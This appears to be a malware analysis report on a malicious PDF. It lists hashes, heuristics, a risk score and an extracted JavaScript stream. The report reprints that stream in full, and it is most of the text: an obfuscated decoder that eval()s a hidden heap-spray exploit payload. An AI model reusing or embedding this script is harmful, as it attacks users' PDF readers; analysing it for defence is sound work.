Malicious PDF — malware analysis report

Static analysis result for SHA-256 985ae0ec596c49fb…

MALICIOUS

PDF

9.4 KB Created: 2010-06-15 21:35:57 Authoring application: eQ3LQYO9rft02 (via q3y6v8H) First seen: 2026-05-10
MD5: 19158063f1732b8e9e81467fda919174 SHA-1: 1c315473239ca5849bfc15d4c5d15a84412af603 SHA-256: 985ae0ec596c49fb08e10b6a27f1c9b0dc94670efea2f8dfefada859fa9c7ced
166 Risk Score

Malware Insights

MITRE ATT&CK
T1059.001 PowerShell

The PDF file contains embedded JavaScript, indicated by the PDF_JAVASCRIPT and PDF_JS heuristics. The PDF_EVAL heuristic indicates that the JavaScript is obfuscated and uses an eval() call, likely to download and execute a second-stage payload. The extracted artifact javascript_obj0007_000.js is also flagged as suspicious because of script obfuscation. Confidence is moderate because the obfuscation prevents a full analysis of the script's exact actions.

Machine Learning

  • Nyx PDF Classifier malicious score 1.0000

Heuristics 4

  • JavaScript action low 2 related findings PDF_JAVASCRIPT
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • PDF JavaScript exploit cluster critical PDF_JS_EXPLOIT_CLUSTER
    PDF combines an executable JavaScript/action surface with exploit-staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript on its own remains low-severity, but this correlated cluster is a high-confidence indicator of malicious behavior.
    Matched line in script
    %O {09%O09o(%OM, n%OG{ D%On ,{%O  09%OG{{M%Oo{,{%O50X0%O9X5G%OX{G{%Oo{n %OG<, %OMMP,%O,ooP%OGD n%OX,XG%OG{GX%O5M,o%O,G<9%O,,o9%O 5n,%OnP<5%O<909%OnP09%OG{{n%OW (X%OG(09%O0959%OM(nP%O(XG{%OGn09%OG{09%On,X5%OXonX%OGMGD%O,n<D%O,<,,%On5,<%O5(no%O5<5X%OGM5,%OD90W%OD<D9%OXM(5%O09XM%O0o(<%O(,0,%OD(0G%O0 XG%O000G%OXM0M%O0{0X%O0D0M%O0{XM%O0,0M%OXG09%O0WD<%O(MD<%O090 %O( (o%O<<(W\"v;\nyy.\nyyib4iypKyzpSLLN)RopHwCuC{9y==yXvr\nyyyyf4o9NKYT{fH}fSAGy=yOki4qcmiz\"%O9(9(%O9(9(%O9(9(%O<MGn%O((Pn%O00{ %OW<n %OW<< …
  • Embedded JS stream low PDF_JS
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Suspicious extracted artifact medium EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size
javascript_obj0007_000.js pdf-javascript-stream PDF /JS object 7 at offset 0x242 8072 bytes
SHA-256: 0c5c096b137a40f5a076dff6584bfe2ce78e3a85e626e1125b33f1ba92512a05
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 1 eval/decoder/string-building token(s). 109 of 145 identifiers look randomly generated (e.g. 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmn') — consistent with name-mangling obfuscation.
Preview script
First 1,000 lines of the extracted script
function CrNtSeDK(CrNtSeDK,qOaI5esUjub5Uz) {var GYkIciFuitQSpQGwzjH=CrNtSeDK. substr (qOaI5esUjub5Uz, 1);return GYkIciFuitQSpQGwzjH;}/*MYUh9YmCXC5ebfm3Es|nb46HKC3AmB0yaK|aj8d7AYbb4*/function Sx3C8P5(LFpsyr9BY) {/*V9w9mO|iVFkPGMR6ArHWHqUloU|Gw4KI47IgLDEhIpwO1DL*/var GgqFuHh = new String("<>(){} .,ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789");/*uSO29jdn4dtrY40S18z[C4kKj]ZbakTL2iE2*//*ifCCPta|jtBiiFk|qvCDKdevxqnV*/var JXHAhaxbcw /*gdSBgURPvbzfdYEj9[PujT5CxqzeTLO]ph1L2JbokRJDpNnpv2*/= new String("Qezvr.y185n{oGM6YwhglZI2JExRFBuHTVfcjqLiKU}pSAb7kNm3>4aOt)dsC<,X(9P0DW ");/*UMUXAANeUYs|EQCPILr|v86zoKcT5VtQhDnhD*/for(XD2dtlRblT0uZWbf=0;XD2dtlRblT0uZWbf<GgqFuHh.length;XD2dtlRblT0uZWbf++) {if(LFpsyr9BY == CrNtSeDK(JXHAhaxbcw, XD2dtlRblT0uZWbf)) {/*CYPuiUBkkKvR6hQ3X4[AO8L7]tB2RFtTd*/return CrNtSeDK(GgqFuHh, XD2dtlRblT0uZWbf);/*ECTFm3QYLN6bGTWJJlIV <XFkQWpAqJ9uLT0]NGMYTJ0acMjmxs7WGD*/}}return LFpsyr9BY;}/*XZnXGwX18qrw4y9TIIJi[WINK1Lh7OeVoHs]AFl2wTpqHoAQxJzY*//*AlqzxOxBsIp00|u6BmsUSZc6Z|ujiIGguwVhAIjtRP*/var ArCD86 = new String;var Anfu6AxGj = new String("\ntc>ydR HwffNCSGIAI9Uy=yki)y5>>cszv;\ntc>ysEil2ZIXd5tZ{uIi;\nKOkqapNky)un6PAPPBhRGUuOqzYfsgtZZaTYMS7L2A8yqc,Gg0hm2b9PYs}ovr\nyy)}pbiyzYfsgtZZaTYMS7L2A1bikUa}y*yXyQyqc,Gg0hm2b9PYs}ovr\nyyyyYfsgtZZaTYMS7L2Ay+=yYfsgtZZaTYMS7L2A;\nyy.\nyyYfsgtZZaTYMS7L2Ay=yYfsgtZZaTYMS7L2A14Oj4a>pkUz<8yqc,Gg0hm2b9PYs}oy/yXv;\nyy>iaO>kyYfsgtZZaTYMS7L2A;\n.\nKOkqapNkyJKTF(OIfnLhd6ppJzpSLLN)RopHwCuC{9vr\nyytc>yZAT}iO6mVfkNYuGcy=y<d<q<q<q<q;\nyytc>yf4o9NKYT{fH}fSAGy=yOki4qcmiz\"%O9(9(%O9(9(%O9(9(%O<MGn%O((Pn%O00{ %OW<n %OW<<,%OGM((%OGX9(%OGnM5%OGW<P%OMMG{%OMMMM%OWnDM%OoM9G%OGMGM%O09GM%OG(5M%O M09%O9XM(%O M09%O0GGD%OGM<(%OGMGn%O09GM%On <(%O0,WD%OG,5,%O<D<(%OGM,,%OGMGM%O5500%On Gn%ODDWD%O0P,,%O<DG,%OGM,M%OGMGM%O5500%On GD%O{5WD%O,<PM%O<DXo%OGM<o%OGMGM%O5500%On G(%O<<WD%O<MX,%O<DWM%OGM(n%OGMGM%O5500%On MM%OXGWD%O<5 0%O<DPD%OGMX %OGMGM%O5500%O5MMn%OoD0M%O 5X{%O00,P%OMD55%OGW<0%OGMGG%On,GM%O 500%O09{n%OGn55%OGGWP%O09n0%OMDn5%O<Dn 
%OGM09%OGMGM%OWDnM%OMPo %O M{<%ODW<D%OGMGM%O00GM%OM(55%OX509%OXM0{%O00nM%O{M55%O,<WD%OGMGM%OnMGM%O5509%OWPMn%On0Go%On509%O<DMD%OGMWG%OGMGM%O55G{%OXW{M%On(GM%O{, ,%OXWW5%OGn5M%OW5 D%OGMGM%O 5,<%O09{M%OG(55%OGGWP%O09n0%OMDn5%O5M<D%OGMGM%OWPGM%OnDGW%O55G{%Oo{{n%On{(9%O,<n{%O{M 5%On{nM%O5509%OWPM(%On0G5%On509%O<DMD%OGM{{%OGMGM%OGMWP%O 5,<%O09{M%OGD55%OGoWP%O09n0%OMDn5%OMM<D%OGMGM%OWPGM%O09,<%OMM55%OGGWP%O09n0%OMDn5%OGM<D%OGMGM%O5GGM%Onon9%O<GG{%O<GG{%O<GG{%O<GG{%O<(0{%OnPGn%O09n{%O<o(P%Ono,W%O<M,<%O09n5%O09<(%OGD X%OnX09%On G(%O {09%O09o(%OM, n%OG{ D%On ,{%O  09%OG{{M%Oo{,{%O50X0%O9X5G%OX{G{%Oo{n %OG<, %OMMP,%O,ooP%OGD n%OX,XG%OG{GX%O5M,o%O,G<9%O,,o9%O 5n,%OnP<5%O<909%OnP09%OG{{n%OW (X%OG(09%O0959%OM(nP%O(XG{%OGn09%OG{09%On,X5%OXonX%OGMGD%O,n<D%O,<,,%On5,<%O5(no%O5<5X%OGM5,%OD90W%OD<D9%OXM(5%O09XM%O0o(<%O(,0,%OD(0G%O0 XG%O000G%OXM0M%O0{0X%O0D0M%O0{XM%O0,0M%OXG09%O0WD<%O(MD<%O090 %O( (o%O<<(W\"v;\nyypKyzpSLLN)RopHwCuC{9y==y,vr\nyyyyZAT}iO6mVfkNYuGcy=y<d(<(<(<(<;\nyyyyf4o9NKYT{fH}fSAGy=yOki4qcmiz\"%O9(9(%O9(9(%O9(9(%O<MGn%O((Pn%O00{ %OW<n %OW<<,%OGM((%OGX9(%OGnM5%OGW<P%OMMG{%OMMMM%OWnDM%OoM9G%OGMGM%O09GM%OG(5M%O M09%O9XM(%O M09%O0GGD%OGM<(%OGMGn%O09GM%On <(%O0,WD%OG,5,%O<D<(%OGM,,%OGMGM%O5500%On Gn%ODDWD%O0P,,%O<DG,%OGM,M%OGMGM%O5500%On GD%O{5WD%O,<PM%O<DXo%OGM<o%OGMGM%O5500%On G(%O<<WD%O<MX,%O<DWM%OGM(n%OGMGM%O5500%On MM%OXGWD%O<5 0%O<DPD%OGMX %OGMGM%O5500%O5MMn%OoD0M%O 5X{%O00,P%OMD55%OGW<0%OGMGG%On,GM%O 500%O09{n%OGn55%OGGWP%O09n0%OMDn5%O<Dn %OGM09%OGMGM%OWDnM%OMPo %O M{<%ODW<D%OGMGM%O00GM%OM(55%OX509%OXM0{%O00nM%O{M55%O,<WD%OGMGM%OnMGM%O5509%OWPMn%On0Go%On509%O<DMD%OGMWG%OGMGM%O55G{%OXW{M%On(GM%O{, ,%OXWW5%OGn5M%OW5 D%OGMGM%O 5,<%O09{M%OG(55%OGGWP%O09n0%OMDn5%O5M<D%OGMGM%OWPGM%OnDGW%O55G{%Oo{{n%On{(9%O,<n{%O{M 5%On{nM%O5509%OWPM(%On0G5%On509%O<DMD%OGM{{%OGMGM%OGMWP%O 5,<%O09{M%OGD55%OGoWP%O09n0%OMDn5%OMM<D%OGMGM%OWPGM%O09,<%OMM55%OGGWP%O09n0%OMDn5%OGM<D%OGMGM%O5GGM%Onon9%O<GG{%O<GG{%O<GG{%O<GG{%O<(0{%OnPGn%O09n{%O<o(P%Ono,W%O<M,<%O09n5%O09<(%OGD X%OnX09%On G(%O 
{09%O09o(%OM, n%OG{ D%On ,{%O  09%OG{{M%Oo{,{%O50X0%O9X5G%OX{G{%Oo{n %OG<, %OMMP,%O,ooP%OGD n%OX,XG%OG{GX%O5M,o%O,G<9%O,,o9%O 5n,%OnP<5%O<909%OnP09%OG{{n%OW (X%OG(09%O0959%OM(nP%O(XG{%OGn09%OG{09%On,X5%OXonX%OGMGD%O,n<D%O,<,,%On5,<%O5(no%O5<5X%OGM5,%OD90W%OD<D9%OXM(5%O09XM%O0o(<%O(,0,%OD(0G%O0 XG%O000G%OXM0M%O0{0X%O0D0M%O0{XM%O0,0M%OXG09%O0WD<%O(MD<%O090 %O( (o%O<<(W\"v;\nyy.\nyyib4iypKyzpSLLN)RopHwCuC{9y==yXvr\nyyyyf4o9NKYT{fH}fSAGy=yOki4qcmiz\"%O9(9(%O9(9(%O9(9(%O<MGn%O((Pn%O00{ %OW<n %OW<<,%OGM((%OGX9(%OGnM5%OGW<P%OMMG{%OMMMM%OWnDM%OoM9G%OGMGM%O09GM%OG(5M%O M09%O9XM(%O M09%O0GGD%OGM<(%OGMGn%O09GM%On <(%O0,WD%OG,5,%O<D<(%OGM,,%OGMGM%O5500%On Gn%ODDWD%O0P,,%O<DG,%OGM,M%OGMGM%O5500%On GD%O{5WD%O,<PM%O<DXo%OGM<o%OGMGM%O5500%On G(%O<<WD%O<MX,%O<DWM%OGM(n%OGMGM%O5500%On MM%OXGWD%O<5 0%O<DPD%OGMX %OGMGM%O5500%O5MMn%OoD0M%O 5X{%O00,P%OMD55%OGW<0%OGMGG%On,GM%O 500%O09{n%OGn55%OGGWP%O09n0%OMDn5%O<Dn %OGM09%OGMGM%OWDnM%OMPo %O M{<%ODW<D%OGMGM%O00GM%OM(55%OX509%OXM0{%O00nM%O{M55%O,<WD%OGMGM%OnMGM%O5509%OWPMn%On0Go%On509%O<DMD%OGMWG%OGMGM%O55G{%OXW{M%On(GM%O{, ,%OXWW5%OGn5M%OW5 D%OGMGM%O 5,<%O09{M%OG(55%OGGWP%O09n0%OMDn5%O5M<D%OGMGM%OWPGM%OnDGW%O55G{%Oo{{n%On{(9%O,<n{%O{M 5%On{nM%O5509%OWPM(%On0G5%On509%O<DMD%OGM{{%OGMGM%OGMWP%O 5,<%O09{M%OGD55%OGoWP%O09n0%OMDn5%OMM<D%OGMGM%OWPGM%O09,<%OMM55%OGGWP%O09n0%OMDn5%OGM<D%OGMGM%O5GGM%Onon9%O<GG{%O<GG{%O<GG{%O<GG{%O<(0{%OnPGn%O09n{%O<o(P%Ono,W%O<M,<%O09n5%O09<(%OGD X%OnX09%On G(%O {09%O09o(%OM, n%OG{ D%On ,{%O  09%OG{{M%Oo{,{%O50X0%O9X5G%OX{G{%Oo{n %OG<, %OMMP,%O,ooP%OGD n%OX,XG%OG{GX%O5M,o%O,G<9%O,,o9%O 5n,%OnP<5%O<909%OnP09%OG{{n%OW (X%OG(09%O0959%OM(nP%O(XG{%OGn09%OG{09%On,X5%OXonX%OGMGD%O,n<D%O,<,,%On5,<%O5(no%O5<5X%OGM5,%OD90W%OD<D9%OXM(5%O09XM%O0o(<%O(,0,%OD(0G%O0 XG%O000G%OXM0M%O0{0X%O0D0M%O0{XM%O0,0M%OXG09%O0WD<%O(MD<%O090 %O( (o%O<<(W\"v;\nyy.\nyytc>ySw) oosb77fPYNKTy=y<d9<<<<<;\nyytc>yc4cuV4(AxfR,woM7y=yf4o9NKYT{fH}fSAG1bikUa}y*yX;\nyytc>yqc,Gg0hm2b9PYs}oy=ySw) 
oosb77fPYNKTy-yzc4cuV4(AxfR,woM7y+y<d(Wv;\nyytc>yYfsgtZZaTYMS7L2Ay=yOki4qcmiz\"%O < <%O < <\"v;\nyyYfsgtZZaTYMS7L2Ay=y)un6PAPPBhRGUuOqzYfsgtZZaTYMS7L2A8yqc,Gg0hm2b9PYs}ov;\nyytc>ymnOp2aFnK96d4tBVy=yzZAT}iO6mVfkNYuGcy-y<d9<<<<<vy/ySw) oosb77fPYNKT;\nyyKN>yztc>y>09ZdDWJKfJd7iSwy=y<;y>09ZdDWJKfJd7iSwyQymnOp2aFnK96d4tBV;y>09ZdDWJKfJd7iSwy++yvr\nyyyydR HwffNCSGIAI9U[>09ZdDWJKfJd7iSw]y=yYfsgtZZaTYMS7L2Ay+yf4o9NKYT{fH}fSAG;\nyy.\n.\nKOkqapNkykiXGVuJofUnxjKCJzvr\nyytc>yh9bS<4 NRT7M{HT9y=y<;\nyytc>y6VYSP}dLI PCN92fy=ycmm1tpi)i>ui>4pNk1aNRa>pkUzv;\nyycmm1qbic>Fp7i2OazsEil2ZIXd5tZ{uIiv;\n\nyypKyz6VYSP}dLI PCN92fyQyD1,vr\nyyyyJKTF(OIfnLhd6ppJz<v;\nyyyytc>y><w6(x0BC>SnI6Mfy=yOki4qcmiz\"%O<q<q%O<q<q\"v;\nyyyy)}pbiyz><w6(x0BC>SnI6Mf1bikUa}yQy99 PXv><w6(x0BC>SnI6Mfy+=y><w6(x0BC>SnI6Mf;\nyyyya}p4y1qNbbcjRaN>iy=y{Nbbcj1qNbbiqaG7cpbwkKNzr\nyyyyyy4OjSy:y\"\"8y74Uy:y><w6(x0BC>SnI6Mf\nyyyy.\nyyyyv;\nyy.\npKyz6VYSP}dLI PCN92fye=y vr\nyyyya>syr\npKyzcmm1LNq1{Nbbcj1UiawqNkvr\nyyyyyyyyJKTF(OIfnLhd6ppJzXv;\nyyyyyyyytc>yYHwaGMHq2cj{iC7by=yOki4qcmiz\"%< \"v;\nyyyyyyyy)}pbiyzYHwaGMHq2cj{iC7b1bikUa}yQy<d9<<<vYHwaGMHq2cj{iC7by+=yYHwaGMHq2cj{iC7b;\nyyyyyyyyYHwaGMHq2cj{iC7by=y\"I1\"y+yYHwaGMHq2cj{iC7b;\ncmm1LNq1{Nbbcj1UiawqNkzYHwaGMHq2cj{iC7bv;\nyyyyyyyyh9bS<4 NRT7M{HT9y=y,;\nyyyyyy.\nyyyyyyib4iyr\nyyyyyyyyh9bS<4 NRT7M{HT9y=y,;\nyyyyyy.\nyyyy.\nyyyyqcaq}yzivr\nyyyyyyh9bS<4 NRT7M{HT9y=y,;\nyyyy.\nyyyypKyzh9bS<4 NRT7M{HT9y==y,vr\nyyyyyypKyzz6VYSP}dLI PCN92fye=yD1,&&y6VYSP}dLI PCN92fyQy vvr\nyyyyyyyyJKTF(OIfnLhd6ppJz,v;\nyyyyyyyytc>yf0(nT KHCJpIUd)uy=y\",X                  \";\nyyyyyyyyKN>yzCMJpu)laTdDn)adDy=y<;yCMJpu)laTdDn)adDyQyXD0;yCMJpu)laTdDn)adDy++yvr\nyyyyyyyyyyf0(nT KHCJpIUd)uy+=y\"W\";\nyyyyyyyy.\nyyyyyyyyOapb1m>pkaKz\"%9P<<<K\"8yf0(nT KHCJpIUd)uv;\nyyyyyy.\nyyyy.\nyy.\n.\ncmm1b,YH d( ZAH(}FV{y=ykiXGVuJofUnxjKCJ;\nsEil2ZIXd5tZ{uIiy=ycmm14iaFp7i2Oaz\"cmm1b,YH d( 
ZAH(}FV{zv\"8y,<v;\n");/*HpUEq7wBPMeMlN{LwFRSzEoXFx6yELYM1sQ}qDk5PEI1SECFK*//*X9ZCXezUT3|rFXaW5GZgCokK|APj8Z3WZSYwxO*/for(VAmQeUlEFC9a=0;VAmQeUlEFC9a<Anfu6AxGj.length;VAmQeUlEFC9a++)ArCD86 += Sx3C8P5(CrNtSeDK(Anfu6AxGj,VAmQeUlEFC9a));eval(ArCD86);/*GHnxNB[k7U9dXoE]K8xt7MnUl6tYt*/